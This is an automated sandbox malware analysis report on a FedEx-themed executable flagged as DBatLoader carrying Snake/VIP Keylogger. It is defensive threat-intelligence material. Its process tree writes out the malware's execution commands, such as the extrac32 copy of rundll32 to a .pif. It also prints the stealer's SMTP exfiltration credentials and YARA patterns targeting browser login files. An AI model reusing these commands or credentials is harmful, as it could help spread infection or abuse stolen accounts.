Edit tour

Windows Analysis Report
FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Overview

General Information

Sample name:	FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Analysis ID:	1617727
MD5:	f6118d60f7bf36f088b6b7a2c27624fb
SHA1:	7eff62e10421088c83d4c74fd8d4f54e145a6b97
SHA256:	0009a5bb1bb1542c3663bc48457b7391c940ad8284d92996fa8a058fc4b5a8cc
Tags:	exeFedExuser-abuse_ch
Infos:

Detection

DBatLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Allocates many large memory junks

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Rundll32 Activity

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe" MD5: F6118D60F7BF36F088B6B7A2C27624FB)

cmd.exe (PID: 7524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\MxhvdwzhF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 7640 cmdline: extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif MD5: 9472AAB6390E4F1431BAA912FCFF9707)

ndpha.pif (PID: 7724 cmdline: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif MD5: 889B99C52A60DD49227C5E485A016679)

hzwdvhxM.pif (PID: 7632 cmdline: C:\Users\Public\Libraries\hzwdvhxM.pif MD5: C116D3604CEAFE7057D77FF27552C215)

Mxhvdwzh.PIF (PID: 7948 cmdline: "C:\Users\Public\Libraries\Mxhvdwzh.PIF" MD5: F6118D60F7BF36F088B6B7A2C27624FB)

hzwdvhxM.pif (PID: 8004 cmdline: C:\Users\Public\Libraries\hzwdvhxM.pif MD5: C116D3604CEAFE7057D77FF27552C215)

Mxhvdwzh.PIF (PID: 8112 cmdline: "C:\Users\Public\Libraries\Mxhvdwzh.PIF" MD5: F6118D60F7BF36F088B6B7A2C27624FB)

hzwdvhxM.pif (PID: 8172 cmdline: C:\Users\Public\Libraries\hzwdvhxM.pif MD5: C116D3604CEAFE7057D77FF27552C215)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x364ee:$a1: get_encryptedPassword 0x364c2:$a2: get_encryptedUsername 0x36586:$a3: get_timePasswordChanged 0x3649e:$a4: get_passwordField 0x36504:$a5: set_encryptedPassword 0x362d1:$a7: get_logins 0x31b38:$a10: KeyLoggerEventArgs 0x31b07:$a11: KeyLoggerEventArgsEventHandler 0x363a5:$a13: _encryptedPassword
0000000E.00000001.1674039682.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76bb4:$a1: get_encryptedPassword 0x76b88:$a2: get_encryptedUsername 0x76c4c:$a3: get_timePasswordChanged 0x76b64:$a4: get_passwordField 0x76bca:$a5: set_encryptedPassword 0x76997:$a7: get_logins 0x721fe:$a10: KeyLoggerEventArgs 0x721cd:$a11: KeyLoggerEventArgsEventHandler 0x76a6b:$a13: _encryptedPassword
0000000E.00000002.3896243951.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000002.3896211622.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000001.1589020424.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36196:$a1: get_encryptedPassword 0x3616a:$a2: get_encryptedUsername 0x3622e:$a3: get_timePasswordChanged 0x36146:$a4: get_passwordField 0x361ac:$a5: set_encryptedPassword 0x35f79:$a7: get_logins 0x317e0:$a10: KeyLoggerEventArgs 0x317af:$a11: KeyLoggerEventArgsEventHandler 0x3604d:$a13: _encryptedPassword
0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x76bb4:$a1: get_encryptedPassword 0x76b88:$a2: get_encryptedUsername 0x76c4c:$a3: get_timePasswordChanged 0x76b64:$a4: get_passwordField 0x76bca:$a5: set_encryptedPassword 0x76997:$a7: get_logins 0x721fe:$a10: KeyLoggerEventArgs 0x721cd:$a11: KeyLoggerEventArgsEventHandler 0x76a6b:$a13: _encryptedPassword
0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3668e:$a1: get_encryptedPassword 0x36662:$a2: get_encryptedUsername 0x36726:$a3: get_timePasswordChanged 0x3663e:$a4: get_passwordField 0x366a4:$a5: set_encryptedPassword 0x36471:$a7: get_logins 0x31cd8:$a10: KeyLoggerEventArgs 0x31ca7:$a11: KeyLoggerEventArgsEventHandler 0x36545:$a13: _encryptedPassword
0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x34488:$s1: UnHook 0x34424:$s2: SetHook 0x3445d:$s3: CallNextHook 0x343ec:$s4: _hook
0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1464510671.000000000228B000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000007.00000001.1451761141.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
